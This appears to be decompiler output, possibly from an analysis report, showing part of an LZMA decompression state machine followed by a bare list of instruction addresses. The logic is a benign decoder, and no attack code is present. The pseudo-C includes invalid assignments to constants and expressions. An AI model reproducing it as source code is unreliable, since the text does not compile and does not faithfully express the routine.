							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x004070ab
0x004070ab
0x004070af
0x00407166
0x00407169
0x00407175
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x004070b5
0x004070b9
0x004075fa
0x004075fa
0x004075fd
0x00407601
0x00407601
0x004070bf
0x004070c5
0x004070c8
0x004070cc
0x004070cf
0x004070d3
0x00407599
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x00000000
0x004075f6
0x004070d9
0x004070dc
0x004070e2
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x0040710d
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
